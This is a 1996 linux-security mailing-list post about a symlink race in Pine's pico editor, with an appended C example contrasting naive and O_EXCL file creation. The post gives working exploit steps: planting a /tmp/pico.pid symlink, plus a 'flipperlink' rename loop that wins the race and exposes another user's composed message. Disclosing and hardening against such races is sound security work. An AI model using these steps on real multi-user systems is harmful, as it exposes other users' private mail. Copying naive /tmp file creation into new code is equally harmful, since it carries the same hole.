Re: message rejected: Re: [linux-security] Pine security problem.
Pascal A. Dupuis (dupuis lei.ucl.ac.be), Fri, 13 Sep 1996 10:07:19 +0200
Hello,
I got a bunch of messages in reply to Re: Pine Security problem. Here is a
summary:
First of all, the exploit is straightforward with Linux:
ln -s /tmp/hacker.tmp /tmp/pico.pid; touch /tmp/hacker.tmp;
The /tmp/hacker.tmp must be rw-rw-rw- (mode 666), and everybody could
have a look at the composed message.
I also tried Rogier Wolff's suggestion about the flipperlink program,
running at high processor load to have swapping (compiling the kernel):
>main (int argc,char **argv)
> {
> while (1) {
> rename (argv[1],argv[2]);
> rename (argv[2],argv[1]);
> }
> }
and run it with:
> cd /tmp
> ln -s hacker.tmp pico.pid
> flipperlink pico.pid bla
Once the alternate editor is invoked, the hacker.tmp, if not
existing, is created 600, owned by the pine user. At this time, the toggle
stops working as long as the alternate editor is working.
The amazing fact is the ownership:
ls -l /tmp
lrwxrwxrwx 1 hacker grp 10 Sep 13 09:49 bla ->hacker.tmp
-rw------- 1 dupuis grp 3042 Sep 13 09:50 hacker.tmp
hacker> more blah
hacker>blah : permission denied
It is thus the ownership of the destination file which is used.
Greetings
Pascal A. Dupuis
--
Information Science is emerging from the Prehistoric Ages, but its
language still reflects it : gnu, hurd, awk, nroff, ls, ar, chmod, ...
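
The symlink plant described in this message only works if the file under /tmp is opened at a predictable name without refusing an entry that already exists. The following is an added example, not part of the original post and not Pine's or pico's code; the flags in open_naive, the scratch directory and the name target.tmp are assumptions made for illustration.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed naive creation: O_CREAT without O_EXCL follows a planted symlink. */
static int open_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened creation: with O_CREAT|O_EXCL, open() fails with EEXIST if anything
   (even a dangling symlink) already sits at the path. */
static int open_hardened(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Constructed scenario in a private scratch directory: pico.pid is planted as a
   symlink to target.tmp before the editor side opens it. Returns 1 if the
   write went through the link, 0 if the open was refused, -1 on setup error. */
int symlink_followed(int hardened) {
    char dir[] = "/tmp/symdemoXXXXXX";
    char link_path[64], target[64];
    struct stat st;
    int fd, followed;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(link_path, sizeof link_path, "%s/pico.pid", dir);
    snprintf(target, sizeof target, "%s/target.tmp", dir);
    if (symlink(target, link_path) != 0) { rmdir(dir); return -1; }

    fd = hardened ? open_hardened(link_path) : open_naive(link_path);
    if (fd >= 0) {
        if (write(fd, "draft", 5) != 5) perror("write");
        close(fd);
    }
    followed = (stat(target, &st) == 0);   /* was the link target created? */

    unlink(target);
    unlink(link_path);
    rmdir(dir);
    return followed;
}

int main(void) {
    printf("naive open followed the symlink:    %d\n", symlink_followed(0));
    printf("hardened open followed the symlink: %d\n", symlink_followed(1));
    return 0;
}
```

mkstemp() gives the same exclusive-create behaviour and additionally picks an unpredictable name.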